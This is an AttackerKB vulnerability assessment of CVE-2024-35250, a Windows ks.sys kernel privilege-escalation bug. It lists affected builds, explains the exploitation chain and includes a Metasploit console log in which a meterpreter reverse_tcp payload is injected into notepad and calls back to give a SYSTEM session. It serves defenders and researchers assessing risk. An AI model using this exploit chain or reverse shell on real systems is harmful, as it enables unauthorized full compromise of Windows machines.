High
CVE-2024-35250
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2024-35250
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
Add Assessment
Ratings
-
Attacker ValueHigh
-
ExploitabilityVery High
Technical Analysis
The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default. There exists an Access Mode Mismatch LPE in this driver which can be exploited on versions of Windows between 10.0.10240 – 10.0.25398 before the June 2024 patch Tuesday update which include but are not limited to:
- Windows 11 22H2 (before 10.0.22621.3737)
- Windows 11 21H2 (before 10.0.22000.3019)
- Windows 10 22H2 (before 10.0.19045.4529)
- Windows 10 21H2 (before 10.0.19044.4529)
- Windows 10 1607 (before 10.0.14393.7070)
- Windows Server 2022 (before 10.0.20348.2522)
- Windows Server 2016 (before 10.0.14393.7070)
Older EOL versions of Windows are said to be vulnerable though I have not tested them. I have found the version listed above to be exploitable with the metasploit module. It should be noted that Hyper-V hosted installations of Windows by default don’t have an audio device configured making the vulnerability unexploitable.
About the Bug Class
Access Mode Mismatch bugs in the Windows kernel center around the PreviousMode member of the KTHREAD
structure. Every thread has a previous access mode associated with it. The PreviousMode is set to UserMode(1) if a user operates on a device or file through Nt* System Service Call, indicating that the System Service call is from the user. The PreviousMode is set to KernelMode(2) if for example a device driver invoking the Zw* System Service Call.
RequestorMode is a similar field in the I/O Request Packet (IRP) which indicates if the original request came from KernelMode or UserMode. This commonly used field is typically derived from PreviousMode.
About the Vulnerability
An application can use IOCTL_KS_PROPERTY to get or set properties, or to determine the properties supported by a KS object. An application passes IOCTL_KS_PROPERTY
to the ks!KsSynchronousIoControlDevice with a few parameters: IOControl, RequestorMode, Input Buffer, Input Buffer Length, Output Buffer, Output Buffer Length and Status Code. To improve efficiency in IOCTL_KS_PROPERTY
of Kernel Streaming, the requests KSPROPERTY_TYPE_SERIALIZESET
and KSPROPERTY_TYPE_UNSERIALIZESET
are provided to allow users to operate on multiple properties in a single call.
The vulnerability stems from the driver’s use of the function ks!KsSynchronousIoControlDevice
.There are multiple calls to this function throughout the driver which incorrectly hard code the RequestorMode parameter value KernelMode. The vulnerable function ks!KsSynchronousIoControlDevice
can be invoked by issuing a KSPROPERTY_TYPE_UNSERIALIZESET
request in which user controlled parameters are handled with KernelMode privileges specifically when the property is set to KSPROPSETID_DrmAudioStream
. This provides a primitive that allows users to perform arbitrary IOCTL_KS_PROPERTY
operations.
To achieve EoP with this primitive first kCFG must be bypassed. By using the legitimate function RtlSetAllBits
from ntoskrnl.exe
, the arbitrary IOCTL_KS_PROPERTY
operation can be turned into a arbitrary write primitive which can be used to achieve EoP by whatever typical method the user preferers. The metasploit module uses the write primitive to replace the current process token with a system token. Abusing token privileges is also an option.
Attacker Value and Exploitability
The exploit for this vulnerability is very reliable and very stable. It’s worked every time I’ve run it on every vulnerable system I’ve tested it on. Some Windows EoP exploits depending on the nature of the exploit and how privileges are actually being elevated can be flakey and their success rates can vary however this exploit is rock solid. The vulnerable ks.sys is installed by default making this a very useful exploit for attackers and is why I chose to rate it 5/5 for Exploitability. It requires user level privileges as it’s EoP and although affects a very wide range of supported Windows operating systems and is why I chose to give an Attacker Value rating of 4/5.
Metasploit Module in Action
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use cve_2024_35250 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/cve_2024_35250_ks_driver 2024-06-11 excellent Yes Windows Access Mode Mismatch LPE in ks.sys Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/cve_2024_35250_ks_driver [*] Using exploit/windows/local/cve_2024_35250_ks_driver [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/cve_2024_35250_ks_driver) > set lhost 172.16.199.1 lhost => 172.16.199.1 msf6 exploit(windows/local/cve_2024_35250_ks_driver) > set lport 5555 lport => 5555 msf6 exploit(windows/local/cve_2024_35250_ks_driver) > set session -1 session => -1 msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run [*] Reloading module... [*] Started reverse TCP handler on 192.168.123.1:5555 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 22621 [*] Launching notepad to host the exploit... [*] The notepad path is: C:\Windows\System32\notepad.exe [*] The notepad pid is: 4704 [*] Reflectively injecting the DLL into 4704... [*] Sending stage (201798 bytes) to 192.168.123.232 [*] Meterpreter session 18 opened (192.168.123.1:5555 -> 192.168.123.232:49837) at 2024-11-05 16:59:05 -0800 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM dmeterpreter > sysinfo Computer : MSFDEVICE OS : Windows 11 (10.0 Build 22621). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > exit
References
https://github.com/varwara/CVE-2024-35250
https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/
https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- microsoft
Products
- windows 10 1507,
- windows 10 1607,
- windows 10 1809,
- windows 10 21h2,
- windows 10 22h2,
- windows 11 21h2,
- windows 11 22h2,
- windows 11 23h2,
- windows server 2008 -,
- windows server 2008 r2,
- windows server 2012 -,
- windows server 2012 r2,
- windows server 2016,
- windows server 2019,
- windows server 2022,
- windows server 2022 23h2
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: